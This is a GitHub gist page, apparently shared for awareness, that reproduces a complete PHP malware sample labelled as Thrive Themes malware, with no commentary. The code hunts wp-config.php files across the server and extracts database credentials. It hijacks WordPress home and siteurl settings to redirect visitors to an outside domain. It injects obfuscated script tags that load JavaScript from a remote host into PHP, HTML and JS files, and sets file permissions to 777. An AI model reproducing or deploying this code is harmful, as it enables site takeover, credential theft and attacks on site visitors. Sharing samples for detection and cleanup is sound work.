-
-
Save magefix/7e2610bd33ce69871aa8a67bd34f1b0c to your computer and use it in GitHub Desktop.
lte_ malware ( Thrive Themes )
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php echo "ssqqss>>>"; | |
error_reporting(0); | |
ini_set('display_errors',0); | |
ini_set('max_execution_time', '300'); | |
ini_set('memory_limit', '-1'); | |
$dsd = "https://www.mysteriouslight.online"; | |
$count = 0; | |
search_file_ms($_SERVER['DOCUMENT_ROOT']."/../../","wp-config.php"); | |
search_file_ms($_SERVER['DOCUMENT_ROOT']."/../../../../../../../","wp-config.php"); | |
echo "\r\n | |
msqqqq count:: ". $count; | |
echo "<<<<ssqqss"; | |
function get_var_reg($pat,$text) { | |
if ($c = preg_match_all ("/".$pat."/is", $text, $matches)) | |
{ | |
return $matches[1][0]; | |
} | |
return ""; | |
} | |
function search_file_ms($dir,$file_to_search){ | |
$search_array = array(); | |
$files = scandir($dir); | |
if($files == false) { | |
$dir = substr($dir, 0, -3); | |
if (strpos($dir, '../') !== false) { | |
@search_file_ms( $dir,$file_to_search); | |
return; | |
} | |
if($dir == $_SERVER['DOCUMENT_ROOT']."/") { | |
@search_file_ms( $dir,$file_to_search); | |
return; | |
} | |
} else { | |
foreach($files as $key => $value){ | |
$path = realpath($dir.DIRECTORY_SEPARATOR.$value); | |
if(!is_dir($path)) { | |
if (strpos($value,$file_to_search) !== false) { | |
show_sitenames($path); | |
} | |
} else if($value != "." && $value != "..") { | |
@search_file_ms($path, $file_to_search); | |
} | |
} | |
} | |
} | |
function show_sitenames($file){ | |
$content = @file_get_contents($file); | |
if(strpos($content, "DB_NAME") !== false) { | |
$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content); | |
$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content); | |
$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content); | |
$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content); | |
// Create connection | |
$conn = new mysqli($host, $user, $pass); | |
// Check connection | |
if ($conn->connect_error) { | |
} else { | |
$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%posts%'"; | |
$result = $conn->query($q); | |
if ($result->num_rows > 0) { | |
while($row = $result->fetch_assoc()) { | |
$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." LIMIT 1 "; | |
$result2 = $conn->query($q2); | |
if ($result2->num_rows > 0) { | |
while($row2 = $result2->fetch_assoc()) { | |
$val = $row2['post_content']; | |
if(strpos($val, "stick.travelinskydream.ga") === false){ | |
if(strpos($val, "stick.travelinskydream.ga") === false){ | |
$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://stick.travelinskydream.ga/analytics.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%stick.travelinskydream.ga%'"; | |
//$conn->query($q3); | |
//echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]; | |
} else { | |
} | |
} | |
} | |
} else { | |
} | |
} | |
} else { | |
} | |
$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%options%'"; | |
$result = $conn->query($q); | |
if ($result->num_rows > 0) { | |
while($row = $result->fetch_assoc()) { | |
global $count; | |
$count++; | |
$q2 = "SELECT option_value FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." WHERE option_name='home'"; | |
$result2 = $conn->query($q2); | |
if ($result2->num_rows > 0) { | |
while($row2 = $result2->fetch_assoc()) { | |
$val = $row2['option_value']; | |
if(strpos($val, "stick.travelinskydream.ga") === false){ | |
if(strpos($val, "det.php") !== false){ | |
$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." SET option_value='https://www.mysteriouslight.online' WHERE option_name='home'"; | |
$conn->query($q3); | |
$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." SET option_value='https://www.mysteriouslight.online' WHERE option_name='siteurl'"; | |
$conn->query($q3); | |
echo "sql: ".$val." to https://www.mysteriouslight.online"; | |
} else { | |
} | |
} | |
} | |
} else { | |
} | |
} | |
} else { | |
} | |
$conn->close(); | |
} | |
} | |
} | |
function search_file($dir,$file_to_search){ | |
$files = @scandir($dir); | |
if($files == false) { | |
$dir = substr($dir, 0, -3); | |
if (strpos($dir, '../') !== false) { | |
@search_file( $dir,$file_to_search); | |
return; | |
} | |
if($dir == $_SERVER['DOCUMENT_ROOT']."/") { | |
@search_file( $dir,$file_to_search); | |
return; | |
} | |
} | |
foreach($files as $key => $value){ | |
$path = realpath($dir.DIRECTORY_SEPARATOR.$value); | |
if(!is_dir($path)) { | |
if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) { | |
make_it($path); | |
} }else if($value != "." && $value != "..") { | |
search_file($path, $file_to_search); | |
} | |
} | |
} | |
function search_file_index($dir,$file_to_search){ | |
$files = @scandir($dir); | |
if($files == false) { | |
$dir = substr($dir, 0, -3); | |
if (strpos($dir, '../') !== false) { | |
search_file_index( $dir,$file_to_search); | |
return; | |
} | |
if($dir == $_SERVER['DOCUMENT_ROOT']."/") { | |
search_file_index( $dir,$file_to_search); | |
return; | |
} | |
} | |
foreach($files as $key => $value){ | |
$path = realpath($dir.DIRECTORY_SEPARATOR.$value); | |
if(!is_dir($path)) { | |
if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) { | |
make_it_index($path); | |
} }else if($value != "." && $value != "..") { | |
search_file_index($path, $file_to_search); | |
} | |
} | |
} | |
function search_file_js($dir,$file_to_search){ | |
$files = @scandir($dir); | |
if($files == false) { | |
$dir = substr($dir, 0, -3); | |
if (strpos($dir, '../') !== false) { | |
@search_file_js( $dir,$file_to_search); | |
return; | |
} | |
if($dir == $_SERVER['DOCUMENT_ROOT']."/") { | |
@search_file_js( $dir,$file_to_search); | |
return; | |
} | |
} | |
foreach($files as $key => $value){ | |
$path = realpath($dir.DIRECTORY_SEPARATOR.$value); | |
if(!is_dir($path)) { | |
if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) { | |
make_it_js($path); | |
} }else if($value != "." && $value != "..") { | |
search_file_js($path, $file_to_search); | |
} | |
} | |
} | |
function make_it_js($f){ | |
$g = file_get_contents($f); | |
if (strpos($g, '115,116,105,99,107,46,116,114,97,118,101,108,105,110,115,107,121,100,114,101,97,109,46,103,97') !== false) { | |
} else { | |
$l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,105,99,107,46,116,114,97,118,101,108,105,110,115,107,121,100,114,101,97,109,46,103,97,47,97,110,97,108,121,116,105,99,115,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();"; | |
$g = file_get_contents($f); | |
$g = $l2.$g; | |
@system('chmod 777 '.$f); | |
@file_put_contents($f,$g); | |
echo "js:".$f."\r\n"; | |
} | |
} | |
function make_it_index($f){ | |
if (strpos($g, '115,116,105,99,107,46,116,114,97,118,101,108,105,110,115,107,121,100,114,101,97,109,46,103,97') !== false || strpos($g, 'stick.travelinskydream.ga') !== false) { | |
} else { | |
$l2 = "<script type='text/javascript' src='https://stick.travelinskydream.ga/analytics.js?n=nb5'></script>"; | |
$g = file_get_contents($f); | |
$g = $l2.$g; | |
@system('chmod 777 '.$f); | |
@file_put_contents($f,$g); | |
echo "in:".$f."\r\n"; | |
} | |
} | |
function make_it($f){ | |
$g = file_get_contents($f); | |
if (strpos($g, '115,116,105,99,107,46,116,114,97,118,101,108,105,110,115,107,121,100,114,101,97,109,46,103,97') !== false) { | |
} else { | |
$l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,105,99,107,46,116,114,97,118,101,108,105,110,115,107,121,100,114,101,97,109,46,103,97,47,97,110,97,108,121,116,105,99,115,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>"; | |
if (strpos($g, '<head>') !== false) { | |
$b = str_replace("<head>","<head>".$l2,$g); | |
@system('chmod 777 '.$f); | |
@file_put_contents($f,$b); | |
echo "hh:".$f."\r\n"; | |
} | |
if (strpos($g, '</head>') !== false) { | |
$b = str_replace("</head>",$l2."</head>",$g); | |
@system('chmod 777 '.$f); | |
@file_put_contents($f,$b); | |
echo "hh:".$f."\r\n"; | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment